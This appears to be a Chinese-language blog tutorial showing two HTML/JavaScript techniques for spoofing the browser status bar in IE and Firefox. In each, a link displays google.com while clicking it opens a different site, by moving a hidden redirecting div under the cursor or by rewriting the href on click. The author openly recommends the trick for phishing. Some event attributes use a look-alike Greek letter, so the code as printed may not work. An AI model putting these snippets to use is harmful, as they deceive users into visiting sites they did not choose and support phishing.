僞造瀏覽器的狀態欄--IE和FireFox的ClickJacking

方法一：

先看下面一段代碼：

--------------------------------------------------------------------------------------------------------------

<html>
<body>
<div id="open" οnmοuseοver="document.location='http://www.uzmix.net';"
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
<center>
<br>
<br>
<a href="http://www.google.com" οnclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a>
</html>

--------------------------------------------------------------------------------------------------------------
在IE或者FireFox中執行上面這段代碼，當鼠標移動到超鏈接www.google.com上時，IE和FireFox的狀態欄都顯示爲google的域名，但是當點擊超鏈接時卻打開了http://www.uzmix.net。這就實現了一個簡單的clickjacking的攻擊，用來釣魚還是不錯的。

分析一下代碼可以知道，當點擊超鏈接時，執行的函數updatebox(event)將id爲open的div移動到了鼠標下面，模擬了一個onmouseover的操作。

方法二：

其實要隱藏狀態欄，其實直接使a標籤的οnclick=“this.href='http://www.baidu.com'”即可，而且更具有欺騙性。

代碼如下：

----------------------------------------------------------------------------------------

<html>
<body>
<a href="http://www.google.com"
οnclick="this.href='http://www.baidu.com'">http://www.google.com</a>
</html>

----------------------------------------------------------------------------------------